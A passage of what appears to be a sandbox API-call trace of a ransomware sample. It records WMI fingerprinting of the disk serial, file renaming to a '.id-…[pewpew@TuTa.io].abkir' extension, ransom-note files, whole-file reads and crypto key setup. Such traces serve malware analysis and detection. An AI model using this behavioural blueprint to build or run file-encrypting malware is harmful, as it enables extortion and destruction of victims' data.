[6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0209.298] WbemLocator:IUnknown:AddRef (This=0x6027350) returned 0x3 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0209.298] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0209.298] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0209.298] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x2 [0209.298] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x1 [0209.298] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0209.298] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027350) returned 0x0 [0209.298] WbemLocator:IUnknown:AddRef (This=0x6027350) returned 0x3 [0209.298] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x2 [0209.298] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0209.298] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0209.298] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.298] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027390) returned 0x0 [0209.298] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027390, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x603352c) returned 0x0 [0209.728] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b5e4) returned 0x0 [0209.728] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b5e4, pProxy=0x603352c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0209.728] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x1 [0209.728] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b604) returned 0x0 [0209.728] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b5e4) returned 0x0 [0209.728] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b5e4, pProxy=0x603352c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.728] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x2 [0209.728] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0209.728] CoTaskMemFree (pv=0xbd4a38) [0209.729] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x0 [0209.729] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b604) returned 0x0 [0209.729] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0209.729] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0209.730] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0209.730] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0209.730] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0209.730] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b564) returned 0x0 [0209.731] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.731] WbemLocator:IUnknown:Release (This=0xb5b564) returned 0x3 [0209.731] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0209.731] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0209.731] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b5ec) returned 0x0 [0209.731] WbemLocator:IRpcOptions:Query (in: This=0xb5b5ec, pPrx=0xb5b604, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0209.731] WbemLocator:IUnknown:Release (This=0xb5b5ec) returned 0x3 [0209.731] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0209.731] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0209.731] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0209.731] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x603352c) returned 0x0 [0209.731] WbemLocator:IUnknown:AddRef (This=0x603352c) returned 0x4 [0209.731] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x3 [0209.731] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x2 [0209.731] SysStringLen (param_1=0x0) returned 0x0 [0209.731] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0209.731] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0209.731] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.731] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0209.731] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0209.732] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b604) returned 0x0 [0209.732] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x3 [0209.732] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0209.732] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0209.732] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.732] IWbemServices:GetObject (in: This=0x603352c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0209.801] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0209.801] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0209.801] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.801] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3634e08*=0, plFlavor=0x3634e0c*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3634e08*=8, plFlavor=0x3634e0c*=0) returned 0x0 [0209.801] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.801] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.802] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3634e08*=8, plFlavor=0x3634e0c*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3634e08*=8, plFlavor=0x3634e0c*=0) returned 0x0 [0209.802] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.802] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0209.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0209.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0209.802] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36631ae0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0209.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0209.802] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0209.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0209.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0209.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0209.803] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35fcbfc0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35fcbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x360d6960, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0209.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0209.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0209.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0209.803] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x363547c | out: lpFileInformation=0x363547c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd)) returned 1 [0209.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0209.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0209.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0209.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0209.804] GetFileType (hFile=0x27c) returned 0x1 [0209.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0209.804] GetFileType (hFile=0x27c) returned 0x1 [0209.804] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x29c6dbd [0209.805] ReadFile (in: hFile=0x27c, lpBuffer=0x2cc61018, nNumberOfBytesToRead=0x29c6dbd, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2cc61018*, lpNumberOfBytesRead=0x6c0f4ec*=0x29c6dbd, lpOverlapped=0x0) returned 1 [0214.872] CloseHandle (hObject=0x27c) returned 1 [0214.872] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdfbf0) returned 1 [0214.873] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x3798fd0 | out: pbBuffer=0x3798fd0) returned 1 Thread: id = 114 os_tid = 0x870 [0131.380] SysReAllocStringLen (in: pbstr=0x67af89c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af89c*="KERNEL32.DLL") returned 1 [0131.380] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.383] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.383] SysReAllocStringLen (in: pbstr=0x67af89c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af89c*="KERNEL32.DLL") returned 1 [0131.383] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.386] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.387] SysReAllocStringLen (in: pbstr=0x67af878*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67af878*="KERNEL32.DLL") returned 1 [0131.387] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.389] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.391] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.392] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x67af3cc) returned 1 [0132.047] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x67aeed4, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0132.047] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x67aeea8, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0132.047] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x67af0f4 | out: lpFindFileData=0x67af0f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.047] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.048] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0132.048] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.048] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.048] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af38c) returned 1 [0132.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af398) returned 1 [0132.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x67af3cc) returned 1 [0132.048] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x67aeed4, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0132.048] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x67aeea8, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0132.048] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x67af0f4 | out: lpFindFileData=0x67af0f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, 